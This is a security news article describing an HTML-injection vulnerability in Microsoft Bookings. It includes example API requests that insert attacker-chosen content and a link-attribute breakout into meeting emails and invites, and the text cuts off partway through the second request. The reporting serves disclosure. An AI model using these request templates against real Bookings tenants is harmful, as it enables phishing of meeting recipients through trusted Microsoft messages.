Microsoft Bookings Vulnerability Allows Unauthorized Changes to Meeting Details
Security researchers have uncovered a significant vulnerability in Microsoft Bookings, the scheduling tool integrated with Microsoft 365.
The flaw, discovered through technical analysis of the service’s appointment creation and update APIs, allows unauthorized modification of meeting details, posing risks such as phishing, calendar manipulation, and information leakage.
Technical Details and Vulnerability Overview
The vulnerability arises from inadequate input validation and sanitization in several key fields used by Microsoft Bookings.
When a user, either a legitimate customer or a malicious actor, creates or modifies a meeting, the following fields in the API are not sufficiently filtered:
- appointment.serviceNotes
- appointment.additionalNotes
- appointment.body.content
These fields accept arbitrary HTML, which is subsequently embedded in confirmation emails, Teams invitations, and attached ICS (calendar) files.
Example: Exploiting the Booking API
1. Appointment Creation (POST Request)
POST /BookingsService/api/V1/bookingBusinessesc2/[email protected]/appointments?app=BookingsC2&n=11 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
"appointment": {
"serviceNotes": "Injected Note!",
"body": {
"contentType": "html",
"content": "Join meeting here"
},
...
}
}
This request will cause the injected HTML to appear in all meeting-related emails and invites.
2. Appointment Modification via Rescheduling (PUT Request)
PUT /BookingsService/api/V1/bookingBusinessesc2/[email protected]/appointments/[AppointmentID]?app=BookingsC2&n=16 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
"appointment": {
"serviceNotes": "Click me!",
"joinWebUrl": "https://legit.com">Malicious Link
